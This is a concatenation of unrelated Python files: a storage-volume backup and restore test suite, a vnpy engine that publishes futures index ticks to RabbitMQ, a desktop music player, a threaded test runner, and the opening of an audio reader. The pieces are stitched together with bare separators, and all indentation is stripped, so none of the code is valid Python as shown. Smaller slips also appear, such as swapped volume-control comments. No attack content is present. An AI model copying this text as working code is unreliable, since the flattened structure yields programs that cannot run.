def test_ebs_snapshot_backup():
volume_name = create_volume(size = VOLUME_SIZE_SMALL, name = "ebs_volume", driver=EBS)
assert volume_name == "ebs_volume"
mount_volume_and_create_file(volume_name, "test-vol1-v1")
snap1_name = v.create_snapshot("ebs_volume", "snap1")
assert snap1_name == "snap1"
volume = v.inspect_volume("ebs_volume")
snap1 = v.inspect_snapshot("snap1")
assert snap1["VolumeName"] == volume_name
assert snap1["Name"] == "snap1"
assert str(snap1["DriverInfo"]["Size"]) == VOLUME_SIZE_SMALL
assert snap1["DriverInfo"]["EBSVolumeID"] == volume["DriverInfo"]["EBSVolumeID"]
assert snap1["DriverInfo"]["Size"] == volume["DriverInfo"]["Size"]
backup_url = v.create_backup(snap1_name)
backup = v.inspect_backup(backup_url)
assert backup["EBSVolumeID"] == volume["DriverInfo"]["EBSVolumeID"]
assert backup["EBSSnapshotID"] == snap1["DriverInfo"]["EBSSnapshotID"]
assert backup["Size"] == snap1["DriverInfo"]["Size"]
v.delete_backup(backup_url)
v.delete_snapshot("snap1")
delete_volume(volume_name)
def create_delete_volume():
vol = v.create_volume(size = VOLUME_SIZE_6M)
snap = v.create_snapshot(vol)
v.delete_snapshot(snap)
v.delete_volume(vol)
# uses default driver which is device mapper
def test_create_volume_in_parallel():
threads = []
for i in range(TEST_THREAD_COUNT):
threads.append(threading.Thread(target = create_delete_volume))
threads[i].start()
for i in range(TEST_THREAD_COUNT):
threads[i].join()
def test_create_volume_in_sequence():
for i in range(TEST_LOOP_COUNT):
create_delete_volume()
def compress_volume(volume_name):
mountpoint = mount_volume(volume_name)
zipfile = os.path.join(TEST_ROOT, volume_name)
shutil.make_archive(zipfile, "zip", mountpoint)
umount_volume(volume_name, mountpoint)
return zipfile + ".zip"
def get_volume_checksum(volume_name, driver):
f = ""
if driver == VFS:
f = compress_volume(volume_name)
else: # DM/EBS
f = v.inspect_volume(volume_name)["DriverInfo"]["Device"]
output = subprocess.check_output(["sha512sum", f]).decode()
if driver == "VFS" and f != "":
os.remove(f)
return output.split(" ")[0]
def check_restore(origin_vol, restored_vol, driver):
volume_checksum = get_volume_checksum(origin_vol, driver)
restore_checksum = get_volume_checksum(restored_vol, driver)
assert volume_checksum == restore_checksum
def test_backup_create_restore_only():
process_restore_with_original_removed(VFS, VFS_DEST)
process_restore_with_original_removed(DM, VFS_DEST)
if test_ebs:
process_restore_with_original_removed(EBS)
def process_restore_with_original_removed(driver, dest = ""):
volume1_name = create_volume(size = VOLUME_SIZE_BIG, driver = driver)
mount_volume_and_create_file(volume1_name, "test-vol1-v1")
snap1_vol1_name = v.create_snapshot(volume1_name)
bak = v.create_backup(snap1_vol1_name, dest)
volume1_checksum = get_volume_checksum(volume1_name, driver)
delete_volume(volume1_name)
if driver == DM:
#cannot specify different size with backup
with pytest.raises(subprocess.CalledProcessError):
res_volume1_name = create_volume(VOLUME_SIZE_SMALL, "res-vol1", bak,
driver = driver)
res_volume1_name = create_volume(name = "res-vol1", backup = bak, driver =
driver)
res_volume1_checksum = get_volume_checksum(res_volume1_name, driver)
assert res_volume1_checksum == volume1_checksum
delete_volume(res_volume1_name)
v.delete_backup(bak)
def test_duplicate_backup():
process_duplicate_backup_test(VFS_DEST, VFS)
process_duplicate_backup_test(VFS_DEST, DM)
def process_duplicate_backup_test(dest, driver):
volume_name = create_volume(size = VOLUME_SIZE_BIG, driver = driver)
mount_volume_and_create_file(volume_name, "volume_snap_test")
snap_name = v.create_snapshot(volume_name)
volume_checksum = get_volume_checksum(volume_name, driver)
bak1 = v.create_backup(snap_name, dest)
bak2 = v.create_backup(snap_name, dest)
res2 = create_volume(backup = bak2, driver = driver)
res2_checksum = get_volume_checksum(res2, driver = driver)
assert res2_checksum == volume_checksum
v.delete_backup(bak2)
res1 = create_volume(backup = bak1, driver = driver)
res1_checksum = get_volume_checksum(res1, driver = driver)
assert res1_checksum == volume_checksum
v.delete_backup(bak1)
delete_volume(res2)
delete_volume(res1)
delete_volume(volume_name)
def test_vfs_objectstore():
vfs_objectstore_test(VFS)
vfs_objectstore_test(DM)
def vfs_objectstore_test(driver):
process_objectstore_test(VFS_DEST, driver)
@pytest.mark.skipif(not pytest.config.getoption("s3"),
reason="--s3 was not specified")
def test_s3_objectstore():
s3_objectstore_test(VFS)
s3_objectstore_test(DM)
def s3_objectstore_test(driver):
process_objectstore_test(get_s3_dest(), driver)
process_objectstore_test(get_s3_dest(S3_PATH), driver)
def get_s3_dest(path = ""):
region = os.environ[ENV_TEST_AWS_REGION]
bucket = os.environ[ENV_TEST_AWS_BUCKET]
return "s3://" + bucket + "@" + region + "/" + path
def unescape_url(url):
return url.replace("\\u0026", "&").replace("u0026","&")
def process_objectstore_test(dest, driver):
#make sure objectstore is empty
backups = v.list_backup(dest)
assert len(backups) == 0
#add volume to objectstore
name1 = "volume1_" + str(uuid.uuid1())[:8]
name2 = "volume2_" + str(uuid.uuid1())[:8]
volume1_name = create_volume(VOLUME_SIZE_BIG, name1, driver=driver)
volume1 = v.inspect_volume(name1)
volume2_name = create_volume(VOLUME_SIZE_SMALL, name2, driver=driver)
with pytest.raises(subprocess.CalledProcessError):
backups = v.list_backup(dest, volume1_name)
#first snapshots
snap1_vol1_name = v.create_snapshot(volume1_name, "snap1_vol1")
snap1_vol1 = v.inspect_snapshot("snap1_vol1")
snap1_vol1_bak = v.create_backup("snap1_vol1", dest)
backups = v.list_backup(dest, volume1_name)
assert len(backups) == 1
backup = backups[unescape_url(snap1_vol1_bak)]
assert backup["DriverName"] == driver
assert backup["VolumeName"] == volume1["Name"]
if "Size" in volume1["DriverInfo"]:
assert backup["VolumeSize"] == volume1["DriverInfo"]["Size"]
assert backup["VolumeCreatedAt"] == volume1["CreatedTime"]
assert backup["SnapshotName"] == snap1_vol1["Name"]
assert backup["SnapshotCreatedAt"] == snap1_vol1["CreatedTime"]
assert backup["CreatedTime"] != ""
backup = v.inspect_backup(snap1_vol1_bak)
assert backup["DriverName"] == driver
assert backup["VolumeName"] == volume1["Name"]
if "Size" in volume1["DriverInfo"]:
assert backup["VolumeSize"] == volume1["DriverInfo"]["Size"]
assert backup["VolumeCreatedAt"] == volume1["CreatedTime"]
assert backup["SnapshotName"] == snap1_vol1["Name"]
assert backup["SnapshotCreatedAt"] == snap1_vol1["CreatedTime"]
assert backup["CreatedTime"] != ""
snap1_vol2_name = v.create_snapshot(volume2_name, "snap1_vol2")
snap1_vol2_bak = v.create_backup("snap1_vol2", dest)
#list snapshots
backups = v.list_backup(dest, volume2_name)
assert len(backups) == 1
backup = v.inspect_backup(snap1_vol2_bak)
assert backup["VolumeName"] == volume2_name
assert backup["SnapshotName"] == snap1_vol2_name
#second snapshots
mount_volume_and_create_file(volume1_name, "test-vol1-v1")
snap2_vol1_name = v.create_snapshot(volume1_name)
snap2_vol1_bak = v.create_backup(snap2_vol1_name, dest)
mount_volume_and_create_file(volume2_name, "test-vol2-v2")
snap2_vol2_name = v.create_snapshot(volume2_name)
snap2_vol2_bak = v.create_backup(snap2_vol2_name, dest)
#list snapshots again
backups = v.list_backup(dest)
assert len(backups) == 4
assert backups[unescape_url(snap1_vol1_bak)]["DriverName"] == driver
assert backups[unescape_url(snap1_vol1_bak)]["VolumeName"] == volume1_name
assert backups[unescape_url(snap1_vol1_bak)]["SnapshotName"] == snap1_vol1_name
assert backups[unescape_url(snap2_vol1_bak)]["DriverName"] == driver
assert backups[unescape_url(snap2_vol1_bak)]["VolumeName"] == volume1_name
assert backups[unescape_url(snap2_vol1_bak)]["SnapshotName"] == snap2_vol1_name
assert backups[unescape_url(snap1_vol2_bak)]["DriverName"] == driver
assert backups[unescape_url(snap1_vol2_bak)]["VolumeName"] == volume2_name
assert backups[unescape_url(snap1_vol2_bak)]["SnapshotName"] == snap1_vol2_name
assert backups[unescape_url(snap2_vol2_bak)]["DriverName"] == driver
assert backups[unescape_url(snap2_vol2_bak)]["VolumeName"] == volume2_name
assert backups[unescape_url(snap2_vol2_bak)]["SnapshotName"] == snap2_vol2_name
backups = v.list_backup(dest, volume1_name)
assert len(backups) == 2
assert backups[unescape_url(snap1_vol1_bak)]["VolumeName"] == volume1_name
assert backups[unescape_url(snap1_vol1_bak)]["SnapshotName"] == snap1_vol1_name
assert backups[unescape_url(snap2_vol1_bak)]["VolumeName"] == volume1_name
assert backups[unescape_url(snap2_vol1_bak)]["SnapshotName"] == snap2_vol1_name
backups = v.list_backup(dest, volume2_name)
assert len(backups) == 2
assert backups[unescape_url(snap1_vol2_bak)]["VolumeName"] == volume2_name
assert backups[unescape_url(snap1_vol2_bak)]["SnapshotName"] == snap1_vol2_name
assert backups[unescape_url(snap2_vol2_bak)]["VolumeName"] == volume2_name
assert backups[unescape_url(snap2_vol2_bak)]["SnapshotName"] == snap2_vol2_name
#restore snapshot
res_volume1_name = create_volume(name = "res-vol1", backup = snap2_vol1_bak,
driver=driver)
check_restore(volume1_name, res_volume1_name, driver)
res_volume2_name = create_volume(backup = snap2_vol2_bak, driver=driver)
check_restore(volume2_name, res_volume2_name, driver)
#remove snapshots from objectstore
v.delete_backup(snap2_vol1_bak)
v.delete_backup(snap2_vol2_bak)
#list snapshots again
backups = v.list_backup(dest)
assert len(backups) == 2
assert backups[unescape_url(snap1_vol1_bak)]["DriverName"] == driver
assert backups[unescape_url(snap1_vol1_bak)]["VolumeName"] == volume1_name
assert backups[unescape_url(snap1_vol1_bak)]["SnapshotName"] == snap1_vol1_name
assert backups[unescape_url(snap1_vol2_bak)]["DriverName"] == driver
assert backups[unescape_url(snap1_vol2_bak)]["VolumeName"] == volume2_name
assert backups[unescape_url(snap1_vol2_bak)]["SnapshotName"] == snap1_vol2_name
backups = v.list_backup(dest, volume1_name)
assert len(backups) == 1
backup = backups[unescape_url(snap1_vol1_bak)]
assert backup["DriverName"] == driver
assert backup["VolumeName"] == volume1_name
assert backup["SnapshotName"] == snap1_vol1_name
backup = v.inspect_backup(snap1_vol1_bak)
assert backup["DriverName"] == driver
assert backup["VolumeName"] == volume1_name
assert backup["SnapshotName"] == snap1_vol1_name
backups = v.list_backup(dest, volume2_name)
assert len(backups) == 1
backup = backups[unescape_url(snap1_vol2_bak)]
assert backup["DriverName"] == driver
assert backup["VolumeName"] == volume2_name
assert backup["SnapshotName"] == snap1_vol2_name
backup = v.inspect_backup(snap1_vol2_bak)
assert backup["DriverName"] == driver
assert backup["VolumeName"] == volume2_name
assert backup["SnapshotName"] == snap1_vol2_name
#remove snapshots from objectstore
v.delete_backup(snap1_vol2_bak)
v.delete_backup(snap1_vol1_bak)
v.delete_snapshot(snap1_vol1_name)
v.delete_snapshot(snap2_vol1_name)
v.delete_snapshot(snap1_vol2_name)
v.delete_snapshot(snap2_vol2_name)
delete_volume(volume1_name)
delete_volume(volume2_name)
delete_volume(res_volume1_name)
delete_volume(res_volume2_name)
def test_cross_restore_error_checking():
vfs_vol_name = create_volume(driver=VFS)
vfs_snap_name = v.create_snapshot(vfs_vol_name)
vfs_backup = v.create_backup(vfs_snap_name, VFS_DEST)
dm_vol_name = create_volume(size = VOLUME_SIZE_SMALL, driver=DM)
dm_snap_name = v.create_snapshot(dm_vol_name)
dm_backup = v.create_backup(dm_snap_name, VFS_DEST)
with pytest.raises(subprocess.CalledProcessError):
create_volume(driver=VFS, backup=dm_backup)
with pytest.raises(subprocess.CalledProcessError):
create_volume(driver=DM, backup=vfs_backup)
vfs_res = create_volume(driver=VFS, backup=vfs_backup)
dm_res = create_volume(driver=DM, backup=dm_backup)
delete_volume(vfs_vol_name)
delete_volume(vfs_res)
delete_volume(dm_vol_name)
delete_volume(dm_res)
|
engine.py | # encoding: UTF-8
# 通达信指数行情发布器
# 华富资产
import copy
import json
import traceback
from threading import Thread
from datetime import datetime, timedelta
from time import sleep
from logging import ERROR
from pytdx.exhq import TdxExHq_API
from vnpy.event import EventEngine
from vnpy.trader.constant import Exchange
from vnpy.trader.engine import BaseEngine, MainEngine
from vnpy.trader.event import EVENT_TIMER
from vnpy.trader.object import TickData
from vnpy.trader.utility import get_trading_date
from vnpy.data.tdx.tdx_common import TDX_FUTURE_HOSTS
from vnpy.app.cta_strategy_pro.base import (
NIGHT_MARKET_23,
NIGHT_MARKET_SQ2,
MARKET_DAY_ONLY)
from vnpy.amqp.producer import publisher
APP_NAME = 'INDEXDATAPUBLISHER'
class IndexTickPublisher(BaseEngine):
# 指数tick发布服务
# 通过通达信接口,获取指数行情tick,发布至rabbitMQ
# ----------------------------------------------------------------------
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(IndexTickPublisher, self).__init__(
main_engine, event_engine, APP_NAME)
self.main_engine = main_engine
self.event_engine = event_engine
self.create_logger(logger_name=APP_NAME)
self.last_minute = None
self.registerEvent()
self.req_interval = 0.5 # 操作请求间隔500毫秒
self.req_id = 0 # 操作请求编号
self.connection_status = False # 连接状态
self.symbol_exchange_dict = {} # tdx合约与vn交易所的字典
self.symbol_market_dict = {} # tdx合约与tdx市场的字典
self.symbol_tick_dict = {} # tdx合约与最后一个Tick得字典
# self.queue = Queue() # 请求队列
self.pool = None # 线程池
self.req_thread = None # 定时器线程
self.ip_list = TDX_FUTURE_HOSTS
# tdx api
self.fail_ip_dict = {} # 失效得API 的连接服务器配置: IP_port: 分钟倒数
self.best_ip = None
self.best_port = None
self.best_name = None
self.api = None # API 的连接会话对象
self.last_tick_dt = None # 记录该会话对象的最后一个tick时间
self.last_sort_speed_dt = None
self.instrument_count = 50000
self.has_qry_instrument = False
# vt_setting.json内rabbitmq配置项
self.conf = {}
self.pub = None
def write_error(self, content: str):
self.write_log(msg=content, level=ERROR)
def create_publisher(self, conf):
"""创建rabbitmq 消息发布器"""
if self.pub:
return
try:
# 消息发布
self.pub = publisher(host=conf.get('host', 'localhost'),
port=conf.get('port', 5672),
user=conf.get('user', 'admin'),
password=conf.get('password', 'admin'),
channel_number=conf.get('channel_number', 1),
queue_name=conf.get('queue_name', ''),
routing_key=conf.get('routing_key', 'default'),
exchange=conf.get('exchange', 'x_fanout_idx_tick'))
except Exception as ex:
self.write_log(u'创建tick发布器异常:{}'.format(str(ex)))
# ----------------------------------------------------------------------
def registerEvent(self):
"""注册事件监听"""
self.event_engine.register(EVENT_TIMER, self.process_timer_event)
def process_timer_event(self, event):
"""定时执行"""
dt = datetime.now()
if dt.minute == self.last_minute:
return
# 更新失效IP地址得counter
for k in list(self.fail_ip_dict.keys()):
c = self.fail_ip_dict.get(k, 0)
if c <= 0:
self.fail_ip_dict.pop(k, None)
else:
c -= 1
self.fail_ip_dict.update({k: c})
self.check_status()
# ----------------------------------------------------------------------
def ping(self, ip, port=7709):
"""
ping行情服务器
:param ip:
:param port:
:param type_:
:return:
"""
apix = TdxExHq_API()
__time1 = datetime.now()
try:
with apix.connect(ip, port):
if apix.get_instrument_count() > 10000:
_timestamp = (datetime.now() - __time1).total_seconds() * 1000
self.write_log('服务器{}:{},耗时:{}ms'.format(ip, port, _timestamp))
return _timestamp
else:
self.write_log(u'该服务器IP {}无响应.'.format(ip))
return timedelta(seconds=10).total_seconds() * 1000
except Exception as ex:
self.write_error(u'tdx ping服务器{},异常的响应{}'.format(ip, str(ex)))
return timedelta(seconds=10).total_seconds() * 1000
def sort_ip_speed(self):
"""
对所有服务器进行速度排序
:return:
"""
speed_result = []
for x in self.ip_list:
speed = self.ping(x['ip'], x['port'])
x.update({'speed': speed})
speed_result.append(copy.copy(x))
# 更新服务器,按照速度排序
self.ip_list = sorted(speed_result, key=lambda s: s['speed'])
self.write_log(u'服务器访问速度排序:{}'.format(self.ip_list))
# ----------------------------------------------------------------------
def select_best_ip(self):
"""
选择行情服务器
:return: IP地址, 端口, 服务器名称
"""
self.write_log(u'选择通达信行情服务器')
if self.last_sort_speed_dt is None or (datetime.now() - self.last_sort_speed_dt).total_seconds() > 60:
self.sort_ip_speed()
self.last_sort_speed_dt = datetime.now()
valid_ip_list = [x for x in self.ip_list if x.get('speed', 10000) < 10000]
if len(valid_ip_list) == 0:
self.write_error(u'未能找到合适速度得行情服务器')
return None, None, None
for server in valid_ip_list:
ip = server.get('ip')
port = server.get('port')
name = server.get('name', '{}:{}'.format(ip, port))
if '{}:{}'.format(ip, port) in self.fail_ip_dict:
self.write_log(u'{}:{}属于上次异常IP地址,忽略'.format(ip, port))
continue
return ip, port, name
return None, None, None
def connect(self, rabbit_config: dict):
"""
连接通达讯行情服务器
:param n:
:return:
"""
if self.connection_status:
if self.api is not None or getattr(self.api, "client", None) is not None:
self.write_log(u'当前已经连接,不需要重新连接')
return
self.write_log(u'开始通达信行情服务器')
try:
self.api = TdxExHq_API(heartbeat=True, auto_retry=True, raise_exception=True)
# 选取最佳服务器
self.best_ip, self.best_port, self.best_name = self.select_best_ip()
if self.best_ip is None or self.best_port is None:
self.write_error(u'未能选择到服务器')
self.write_log(u'api 选择 {}: {}:{}'.format(self.best_name, self.best_ip, self.best_port))
self.api.connect(self.best_ip, self.best_port)
# 尝试获取市场合约统计
c = self.api.get_instrument_count()
if c is None or c < 10:
err_msg = u'该服务器IP {}/{}无响应'.format(self.best_ip, self.best_port)
self.fail_ip_dict.update({'{}:{}'.format(self.best_ip, self.best_port): 10})
self.write_error(err_msg)
else:
self.write_log(u'创建tdx连接')
self.last_tick_dt = datetime.now()
self.connection_status = True
self.instrument_count = c
except Exception as ex:
self.write_error(u'连接服务器tdx异常:{},{}'.format(str(ex), traceback.format_exc()))
self.fail_ip_dict.update({'{}:{}'.format(self.best_ip, self.best_port): 10})
return
# 更新 symbol_exchange_dict , symbol_market_dict
self.write_log(u'查询合约')
self.qry_instrument()
self.conf.update(rabbit_config)
self.create_publisher(self.conf)
self.req_thread = Thread(target=self.run)
self.req_thread.start()
def reconnect(self):
"""
重连
:return:
"""
try:
self.best_ip, self.best_port, self.best_name = self.select_best_ip()
self.api = TdxExHq_API(heartbeat=True, auto_retry=True)
self.api.connect(self.best_ip, self.best_port)
# 尝试获取市场合约统计
c = self.api.get_instrument_count()
if c is None or c < 10:
err_msg = u'该服务器IP {}/{}无响应'.format(self.best_ip, self.best_port)
self.fail_ip_dict.update({'{}:{}'.format(self.best_ip, self.best_port): 10})
self.write_error(err_msg)
else:
self.write_log(u'重新创建tdx连接')
sleep(1)
except Exception as ex:
self.write_error(u'重新连接服务器异常:{},{}'.format(str(ex), traceback.format_exc()))
self.fail_ip_dict.update({'{}:{}'.format(self.best_ip, self.best_port): 10})
return
def close(self):
"""退出API"""
self.write_log(u'退出tdx API')
self.connection_status = False
if self.req_thread is not None:
self.write_log(u'退出请求线程')
self.req_thread.join()
if self.pub:
self.write_log(u'退出rabbitMQ 发布器')
self.pub.exit()
def check_status(self):
# self.write_log(u'检查tdx接口状态')
# 若还没有启动连接,就启动连接
over_time = self.last_tick_dt is None or (datetime.now() - self.last_tick_dt).total_seconds() > 60
if not self.connection_status or self.api is None or over_time:
self.write_log(u'tdx还没有启动连接,就启动连接')
self.close()
self.api = None
self.reconnect()
# self.write_log(u'tdx接口状态正常')
def qry_instrument(self):
"""
查询/更新合约信息
:return:
"""
if not self.connection_status:
self.write_error(u'tdx连接状态为断开,不能查询和更新合约信息')
return
if self.has_qry_instrument:
self.write_error(u'已经查询过一次合约信息,不再查询')
return
# 取得所有的合约信息
num = self.api.get_instrument_count()
if not isinstance(num, int):
return
all_contacts = sum(
[self.api.get_instrument_info((int(num / 500) - i) * 500, 500) for i in range(int(num / 500) + 1)], [])
# [{"category":category,"market": int,"code":sting,"name":string,"desc":string},{}]
# 对所有合约处理,更新字典 指数合约-tdx市场,指数合约-交易所
for tdx_contract in all_contacts:
tdx_symbol = tdx_contract.get('code', None)
if tdx_symbol is None or tdx_symbol[-2:] not in ['L9']:
continue
tdx_market_id = tdx_contract.get('market')
self.symbol_market_dict[tdx_symbol] = tdx_market_id
if tdx_market_id == 47: # 中金所
self.symbol_exchange_dict[tdx_symbol] = Exchange.CFFEX
elif tdx_market_id == 28: # 郑商所
self.symbol_exchange_dict[tdx_symbol] = Exchange.CZCE
elif tdx_market_id == 29: # 大商所
self.symbol_exchange_dict[tdx_symbol] = Exchange.DCE
elif tdx_market_id == 30: # 上期所+能源
self.symbol_exchange_dict[tdx_symbol] = Exchange.SHFE
elif tdx_market_id == 60: # 主力合约
self.write_log(u'主力合约:{}'.format(tdx_contract))
self.has_qry_instrument = True
def run(self):
# 版本3 :直接查询板块
try:
last_dt = datetime.now()
self.write_log(u'开始运行tdx,{}'.format(last_dt))
while self.connection_status:
try:
self.process_index_req()
except BrokenPipeError as bex:
self.write_error(u'BrokenPipeError{},重试重连tdx[{}]'.format(str(bex), 0))
self.fail_ip_dict.update({'{}:{}'.format(self.best_ip, self.best_port): 10})
self.reconnect()
sleep(5)
break
except Exception as ex:
self.write_error(u'tdx exception:{},{}'.format(str(ex), traceback.format_exc()))
self.fail_ip_dict.update({'{}:{}'.format(self.best_ip, self.best_port): 10})
self.reconnect()
sleep(self.req_interval)
dt = datetime.now()
if last_dt.minute != dt.minute:
self.write_log('tdxcheck point. {},last_tick_dt:{}'.format(dt, self.last_tick_dt))
last_dt = dt
except Exception as ex:
self.write_error(u'tdx pool.run exception:{},{}'.format(str(ex), traceback.format_exc()))
self.write_error(u'tdx 线程 {}退出'.format(datetime.now()))
def process_index_req(self):
"""处理板块获取指数行情tick"""
# 获取通达信指数板块所有行情
rt_list = self.api.get_instrument_quote_list(42, 3, 0, 100)
if rt_list is None or len(rt_list) == 0:
self.write_log(u'tdx:get_instrument_quote_list() rt_list为空')
return
# 记录该接口的行情最后更新时间
self.last_tick_dt = datetime.now()
for d in list(rt_list):
tdx_symbol = d.get('code', None)
if tdx_symbol.endswith('L9'):
vn_symbol = tdx_symbol.replace('L9', '99').upper()
else:
vn_symbol = tdx_symbol.upper()
tick_datetime = datetime.now()
# 修正毫秒
last_tick = self.symbol_tick_dict.get(vn_symbol, None)
if (last_tick is not None) and tick_datetime.replace(microsecond=0) == last_tick.datetime:
# 与上一个tick的时间(去除毫秒后)相同,修改为500毫秒
tick_datetime = tick_datetime.replace(microsecond=500)
else:
tick_datetime = tick_datetime.replace(microsecond=0)
tick = TickData(
gateway_name='tdx',
symbol=vn_symbol,
datetime=tick_datetime,
exchange=self.symbol_exchange_dict.get(tdx_symbol, Exchange.LOCAL)
)
tick.pre_close = float(d.get('ZuoJie', 0.0))
tick.high_price = float(d.get('ZuiGao', 0.0))
tick.open_price = float(d.get('JinKai', 0.0))
tick.low_price = float(d.get('ZuiDi', 0.0))
tick.last_price = float(d.get('MaiChu', 0.0))
tick.volume = int(d.get('XianLiang', 0))
tick.open_interest = d.get('ChiCangLiang')
tick.time = tick.datetime.strftime('%H:%M:%S.%f')[0:12]
tick.date = tick.datetime.strftime('%Y-%m-%d')
tick.trading_day = get_trading_date(tick_datetime)
# 指数没有涨停和跌停,就用昨日收盘价正负10%
tick.limit_up = tick.pre_close * 1.1
tick.limit_down = tick.pre_close * 0.9
# CTP只有一档行情
tick.bid_price_1 = float(d.get('MaiRuJia', 0.0))
tick.bid_volume_1 = int(d.get('MaiRuLiang', 0))
tick.ask_price_1 = float(d.get('MaiChuJia', 0.0))
tick.ask_volume_1 = int(d.get('MaiChuLiang', 0))
underlying_symbol = vn_symbol.replace('99', '').upper()
# 排除非交易时间得tick
if tick.exchange is Exchange.CFFEX:
if tick.datetime.hour not in [9, 10, 11, 13, 14, 15]:
continue
if tick.datetime.hour == 9 and tick.datetime.minute < 15:
continue
# 排除早盘 11:30~12:00
if tick.datetime.hour == 11 and tick.datetime.minute >= 30:
continue
if tick.datetime.hour == 15 and tick.datetime.minute >= 15 and underlying_symbol in ['T', 'TF', 'TS']:
continue
if tick.datetime.hour == 15 and underlying_symbol in ['IH', 'IF', 'IC']:
continue
else: # 大商所/郑商所,上期所,上海能源
# 排除非开盘小时
if tick.datetime.hour in [3, 4, 5, 6, 7, 8, 12, 15, 16, 17, 18, 19, 20]:
continue
# 排除早盘 10:15~10:30
if tick.datetime.hour == 10 and 15 <= tick.datetime.minute < 30:
continue
# 排除早盘 11:30~12:00
if tick.datetime.hour == 11 and tick.datetime.minute >= 30:
continue
# 排除午盘 13:00 ~13:30
if tick.datetime.hour == 13 and tick.datetime.minute < 30:
continue
# 排除凌晨2:30~3:00
if tick.datetime.hour == 2 and tick.datetime.minute >= 30:
continue
# 排除大商所/郑商所/上期所夜盘数据上期所夜盘数据 23:00 收盘
if underlying_symbol in NIGHT_MARKET_23:
if tick.datetime.hour in [23, 0, 1, 2]:
continue
# 排除上期所夜盘数据 1:00 收盘
if underlying_symbol in NIGHT_MARKET_SQ2:
if tick.datetime.hour in [1, 2]:
continue
# 排除日盘合约在夜盘得数据
if underlying_symbol in MARKET_DAY_ONLY and (tick.datetime.hour < 9 or tick.datetime.hour > 16):
# self.write_log(u'排除日盘合约{}在夜盘得数据'.format(short_symbol))
continue
self.symbol_tick_dict[tick.symbol] = tick
if self.pub:
d = copy.copy(tick.__dict__)
if isinstance(tick.datetime, datetime):
d.update({'datetime': tick.datetime.strftime('%Y-%m-%d %H:%M:%S.%f')})
d.update({'exchange': tick.exchange.value()})
d = json.dumps(d)
self.pub.pub(d)
|
main.py | import os
import eel
from pygame import mixer
from mutagen.mp3 import MP3
import threading
print('')
print(r'example:- C:\Users\Admin\Desktop\music')
dir = input('ENTER YOUR MUSIC DIRECTORY:- ')
print('')
eel.init("web") # initialises eel
arr = [] #array keeps track of all songs
i = 0
o = 0 #counter for songs
status = 1 #for play/pause status
vol = 1.0 #controls volume (1.0 = maximum volume)
# adds all songs to array
mylist = os.listdir(dir)
while i != len(mylist):
arr.append(mylist[i])
i += 1
@eel.expose
def play():
# plays music
global status
status = 1
mixer.music.unpause()
return 'play'
@eel.expose
# pauses music
def pause():
global status
status = 0
mixer.music.pause()
return 'pause'
@eel.expose
# decreases volume
def vol_up():
global vol
vol += 0.1
mixer.music.set_volume(vol)
return 'vol_up'
@eel.expose
# increases volume
def vol_down():
global vol
vol -= 0.1
mixer.music.set_volume(vol)
return 'vol_down'
@eel.expose
def next():
global arr
global o
global status
# if music is not paused
if status == 1:
if o + 1 != len(arr):
# loads and plays next song
try:
o += 1
mixer.music.load(dir + "\\" + arr[o])
except:
return
mixer.music.play()
print(arr[o])
return [arr[o], 'next']
# if all songs have been played, it starts playing from the begining
else:
o = 0
mixer.music.load(dir + "\\" + arr[o])
mixer.music.play()
print(arr[o])
return [arr[o], 'next']
# if music is paused
elif status == 0:
if o + 1 != len(arr):
# loads and plays next song
try:
o += 1
mixer.music.load(dir + "\\" + arr[o])
except:
o += 1
mixer.music.load(dir + "\\" + arr[o])
return
mixer.music.play()
mixer.music.pause()
print(arr[o])
return [arr[o], 'next']
# if all songs have been played, it starts playing from the begining
else:
o = 0
mixer.music.load(dir + "\\" + arr[o])
mixer.music.play()
print(arr[o])
return [arr[o], 'next']
@eel.expose
def previous():
global arr
global o
global status
# if music is not paused
if status == 1:
# loads and plays previous song
try:
o -= 1
mixer.music.load(dir + "\\" + arr[o])
except:
return
mixer.music.play()
print(arr[o])
return [arr[o], 'previous']
# if music is paused
elif status == 0:
# loads and plays previous song
try:
o -= 1
mixer.music.load(dir + "\\" + arr[o])
except:
return
mixer.music.play()
mixer.music.pause()
print(arr[o])
return [arr[o], 'previous']
@eel.expose
def main():
global arr
global o
global status
# updates the HTML header with the current playing song
eel.name_update(arr[o])
print(arr[o])
# gets song length
def length():
length = MP3(dir + "\\" + arr[o]).info.length
return int(length)
# updates song slider bar
while mixer.music.get_busy() != 0:
eel.time(int((((mixer.music.get_pos()) / 1000) / length()) * 100))
while status == 0:
o
eel.time(int((((mixer.music.get_pos()) / 1000) / length()) * 100))
# plays next song if song has finished
if mixer.music.get_busy() == 0:
o += 1
if o != len(arr):
mixer.music.load(dir + "\\" + arr[o])
mixer.music.play()
main()
else:
o = 0
mixer.music.load(dir + "\\" + arr[o])
mixer.music.play()
main()
# Starts the index.html file
def start():
eel.start("index.html")
mixer.init()
mixer.music.load(dir + '\\' + arr[o])
mixer.music.play()
if __name__ == '__main__':
threading.Thread(target = start).start()
main() |
engine.py | import logging
import threading
import time
from cct.common.enums import case_running_status
logger = logging.getLogger(__file__)
class Engine(object):
def __init__(self, *keys, **kwargs):
self.__testset = kwargs.get('test_set')
self.__case_thread_list = []
def start(self):
# execute the cases
for id, case in self.__testset.case_dict.items():
t = threading.Thread(target=self.run_single_case, name=case.case_id, kwargs={'case': case})
t.setDaemon(True)
logger.info('test case ={name} will start'.format(name=case.name))
t.start()
self.__case_thread_list.append(t)
for t in self.__case_thread_list:
t.join()
def run_single_case(self, case):
try:
case.status = case_running_status.RUNNING
self.pause_4_depend_other_case(case)
case.pre_test()
self.pause_4_depend_op_status(case)
case.process()
case.post_test()
self.__testset.set_case_status(case, case_running_status.PASS)
except:
self.__testset.set_case_status(case, case_running_status.FAILED)
def pause_4_depend_other_case(self, case):
if case.dependence:
logger.info('case={name} will pause to wait for other case running status'.format(name=case.name))
case.pause()
def pause_4_depend_op_status(self, case):
if case.dep_op_dict:
logger.info('case={name} will pause to wait for other case op status'.format(name=case.name))
case.pause()
else:
logger.info ('case={name} will not pause={rst}'.format(name=case.name, rst=case.dep_op_dict is None))
def do1():
logger.info ("i am doing 1")
|
audio_reader.py | import fnmatch
import os
import random
import re
import threading
import librosa
import numpy as np
import tensorflow as tf
FILE_PATTERN = r'p([0-9]+)_([0-9]+)\.wav'
def get_category_cardinality(files):
id_reg_expression = re.compile(FILE_PATTERN)
min_id = None
max_id = None
for filename in files:
matches = id_reg_expression.findall(filename)[0]
id, recording_id = [int(id_) for id_ in matches]
if min_id is None or id < min_id:
min_id = id
if max_id is None or id > max_id:
max_id = id
return min_id, max_id
def randomize_files(files):
random.shuffle(files)
for file in files:
yield file
